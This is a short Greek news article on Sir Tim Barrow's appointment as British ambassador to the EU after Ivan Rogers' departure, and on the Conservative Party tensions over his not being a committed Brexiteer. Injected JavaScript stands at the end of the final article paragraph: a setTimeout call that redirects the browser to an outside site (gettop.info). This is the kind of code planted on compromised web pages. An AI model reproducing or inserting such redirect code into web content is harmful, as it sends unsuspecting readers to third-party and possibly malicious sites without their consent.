Νέος πρέσβης της Βρετανίας στην Ε.Ε μη φανατικός του Brexit

0
7

 

O σερ Τιμ Μπάροου, διπλωμάτης καριέρας και πρώην πολιτικός διευθυντής του Φόρεϊν Όφις, είναι ο νέος πρέσβης της Βρετανίας στην Ε.Ε, σύμφωνα με απόφαση της πρωθυπουργού Τερέζα Μέι.

Η τοποθέτηση Μπάροου στη θέση που εγκατέλειψε -με αιχμές για την κυβέρνηση και για την (απούσα, σύμφωνα με τον ίδιο) στρατηγική της για το Brexit- o Άιβαν Ρότζερς, προκαλεί νέες εντάσεις στο Συντηρητικό Κόμμα της Βρετανίας, καθώς ο νέος πρέσβης της χώρας στην Ε.Ε. δεν είναι «βαμμένος» υπέρ της εξόδου της χώρας από την Ένωση, όπως απαιτούσαν πολλά στελέχη του κόμματος.

Ο Μπάροου διατέλεσε πρέσβης της Βρετανίας στη Μόσχα ως το 2015 και το Μάρτιο του 2016 ανέλαβε πολιτικός διευθυντής του υπουργείου Εξωτερικών.

Έχει υπάρξει γραμματέας της πρεσβείας της Βρετανίας στην Ε.Ε., έχει μεγάλη εμπειρία σε ευρωπαϊκά θέματα και η τοποθέτησή του θεωρείται νίκη των πιο μετριοπαθών, αλλά και του Φόρεϊν Όφις που είχε χάσει την ηγεσία της πρεσβείας από το 2012. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here